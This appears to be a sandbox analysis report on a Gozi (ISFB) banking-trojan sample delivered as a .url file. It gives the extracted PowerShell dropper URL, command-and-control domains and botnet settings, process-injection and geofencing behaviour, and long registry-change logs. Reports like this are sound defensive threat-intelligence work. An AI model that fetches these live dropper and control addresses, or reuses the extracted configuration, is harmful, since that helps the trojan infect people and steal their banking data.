gozi | 121b856e931732998abebc2716e3794e434e9329463a1a023b6f29c51d7034de

Analysis

max time kernel
151s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
06-10-2023 13:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Direzione.url
Size

198B
MD5

a01b0f3d5e1f18dc90623bc4f490f444
SHA1

0b4c08612e5b1cb5c4eabdda73ac8a6a017a0a48
SHA256

c20129af33139bf212fc3258d2701201e7e1120262890b952314a9068b52aca4
SHA512

089308e776a49953b42741a1d129b7d6bc941df02d8bf052bad9a2256f21bd9402153524ebb910a3f01927f50b4ca82364e5b11b72301ed01c1c56056db7658b

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

41 4148 powershell.exe

flow	pid	process
41	4148	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exemshta.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

Processes:

yYqgVvhX.exe

pid process

2528 yYqgVvhX.exe

pid	process
2528	yYqgVvhX.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 472 set thread context of 3204	472	powershell.exe	Explorer.EXE
PID 3204 set thread context of 3720	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 set thread context of 4016	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 set thread context of 2100	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 set thread context of 1432	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 set thread context of 2244	3204	Explorer.EXE	cmd.exe
PID 3204 set thread context of 4132	3204	Explorer.EXE	cmd.exe
PID 2244 set thread context of 4644	2244	cmd.exe	PING.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2460 2528 WerFault.exe yYqgVvhX.exe

pid	pid_target	process	target process
2460	2528	WerFault.exe	yYqgVvhX.exe

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exerundll32.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\abb29887-a4eb-490a- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\699f7cbb33db3ab991e33086e25d61fb179f5cbb7d286fc5a3254b92c51215c4"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings	rundll32.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c8ada126-3e0e-44e5-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82ef5310-d0cf-487b- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df58ecb6-ad40-4a81- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e4b139a83e7484024779b5fcc44f4eeb0c768d9a13a1392fa676aa79127b8841"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b5ae92b-0986-4f8a- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b5ae92b-0986-4f8a- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7d2d86601353416b8d985fb3a128a6046f43d656fd70422d217daf90a4e4db3e"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\47a072e1-99d0-49ca- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82ef5310-d0cf-487b- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001e547b8c57f8d9011e547b8c57f8d9011e547b8c57f8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000363939663763626233336462336162393931653333303836653235643631666231373966356362623764323836666335613332353462393263353132313563340000b20009000400efbe4657456a4657456a2e00000000000000000000000000000000000000000000000000e240c800360039003900660037006300620062003300330064006200330061006200390039003100650033003300300038003600650032003500640036003100660062003100370039006600350063006200620037006400320038003600660063003500610033003200350034006200390032006300350031003200310035006300340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008ca9743c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36393966376362623333646233616239393165333330383665323564363166623137396635636262376432383666633561333235346239326335313231356334000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e05b99437c9553ee1193597a9c7be5152904d162da5a6511448a0333de6d2491e05b99437c9553ee1193597a9c7be51529ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e27b47e-e553-4527- = eb99988d57f8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\39bd5b8a-f2a9-4e1a-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df58ecb6-ad40-4a81-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f471ddad-8220-4c8f- = 8309a18c57f8d901	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df58ecb6-ad40-4a81- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ec5cfe51-81af-4be4- = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\39bd5b8a-f2a9-4e1a-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\47a072e1-99d0-49ca- = b3da578c57f8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5ddfdd8a-323e-4120- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7d2d86601353416b8d985fb3a128a6046f43d656fd70422d217daf90a4e4db3e"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b5ae92b-0986-4f8a-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e27b47e-e553-4527- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e158f9b1-59c2-4f1c-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\39bd5b8a-f2a9-4e1a- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006e4df78c57f8d9016543b18d57f8d9016543b18d57f8d901fcf705000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000653462313339613833653734383430323437373962356663633434663465656230633736386439613133613133393266613637366161373931323762383834310000b20009000400efbe4657456a4657456a2e00000000000000000000000000000000000000000000000000e51aa200650034006200310033003900610038003300650037003400380034003000320034003700370039006200350066006300630034003400660034006500650062003000630037003600380064003900610031003300610031003300390032006600610036003700360061006100370039003100320037006200380038003400310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008ca9743c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65346231333961383365373438343032343737396235666363343466346565623063373638643961313361313339326661363736616137393132376238383431000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e06599437c9553ee1193597a9c7be5152904d162da5a6511448a0333de6d2491e06599437c9553ee1193597a9c7be51529ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5c7144b0-186e-4ca1-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\47a072e1-99d0-49ca- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\073d2487c7d2f28548abe92373ad335ad4a29a209841581499e4c9daf24869ec"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82ef5310-d0cf-487b- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df58ecb6-ad40-4a81- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b5ae92b-0986-4f8a-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\abb29887-a4eb-490a-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\abb29887-a4eb-490a- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82ef5310-d0cf-487b- = 0e8c878c57f8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5ddfdd8a-323e-4120- = 3ff7918c57f8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f471ddad-8220-4c8f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4748e636-429f-4ebd- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f471ddad-8220-4c8f- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000047c7908c57f8d90147c7908c57f8d90147c7908c57f8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000323632376338303861306261313834333263663562616532333839346631383932633061316566636530613566316562643565336533313065613839663435360000b20009000400efbe4657456a4657456a2e00000000000000000000000000000000000000000000000000b9cdb200320036003200370063003800300038006100300062006100310038003400330032006300660035006200610065003200330038003900340066003100380039003200630030006100310065006600630065003000610035006600310065006200640035006500330065003300310030006500610038003900660034003500360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008ca9743c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32363237633830386130626131383433326366356261653233383934663138393263306131656663653061356631656264356533653331306561383966343536000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e05d99437c9553ee1193597a9c7be5152904d162da5a6511448a0333de6d2491e05d99437c9553ee1193597a9c7be51529ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ec5cfe51-81af-4be4-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ec5cfe51-81af-4be4- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000dd74df8c57f8d901e0d51f8d57f8d901e0d51f8d57f8d9012e1407000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000376263303038386562613639396239326566613437303831623538656635623532613836346266616134316164646365343838393961616530356232646665340000b20009000400efbe4657456a4657456a2e00000000000000000000000000000000000000000000000000d4b8dd00370062006300300030003800380065006200610036003900390062003900320065006600610034003700300038003100620035003800650066003500620035003200610038003600340062006600610061003400310061006400640063006500340038003800390039006100610065003000350062003200640066006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008ca9743c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37626330303838656261363939623932656661343730383162353865663562353261383634626661613431616464636534383839396161653035623264666534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e06099437c9553ee1193597a9c7be5152904d162da5a6511448a0333de6d2491e06099437c9553ee1193597a9c7be51529ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b5ae92b-0986-4f8a- = "0"	RuntimeBroker.exe
